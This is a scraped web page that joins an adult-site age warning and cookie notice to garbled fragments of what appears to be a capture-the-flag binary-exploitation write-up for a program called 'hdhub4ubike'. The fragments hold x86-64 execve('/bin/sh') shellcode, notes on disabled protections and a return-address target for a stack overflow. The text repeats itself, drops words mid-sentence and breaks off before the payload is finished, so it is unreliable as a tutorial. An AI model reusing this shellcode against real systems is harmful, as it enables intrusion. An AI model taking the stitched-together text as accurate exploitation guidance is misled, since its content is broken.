WARNING: explicit sexual games
This website contains adult oriented material
You must be at least 18 years old to enter

Leave this site now:
- if you are under 18, or 21 in some areas
- if visiting this adult website is prohibited by law
- or if you are offended by adult content

Enter and play Virtual Lust 3D Leave

We use COOKIES on our websites. Enter only if you AGREE to use cookies.

Hdhub4ubike

$ ./hdhub4ubike === Welcome to the HD Bike Hub === Enter your hub key: Static analysis quickly reveals that the binary is stripped (no symbols) and that it is compiled with , -z execstack , and -no-pie – classic “easy pwn” settings.

/* ---------------------------------------------------- */ int check_key(const char *key) // key must be exactly 0x30 bytes long if (strlen(key) != 0x30) return 0; hdhub4ubike

# 32‑byte execve("/bin/sh") shellcode (x86‑64) shellcode = ( b"\x48\x31\xd2" # xor rdx, rdx b"\x48\x31\xf6" # xor rsi, rsi b"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00" # movabs rdi, "/bin/sh" b"\x57" # push rdi b"\x48\x89\xe7" # mov rdi, rsp b"\xb0\x3b" # mov al, 0x3b b"\x0f\x05" # syscall ) Therefore we want our to be 0x004011a6

0x0040119f: lea rdi, [rip+0x2000] ; address of the flag string 0x004011a6: call puts@plt 0x004011a6 is the (the call instruction itself). If we return to this address after the overflow, the program will execute the puts call with the correct argument already loaded (the lea instruction that loads the flag pointer into rdi is right before it). rdx b"\x48\x31\xf6" # xor rsi

Therefore we want our to be 0x004011a6 . 3.2 Crafting the payload The stack layout (simplified) at the moment of the overflow: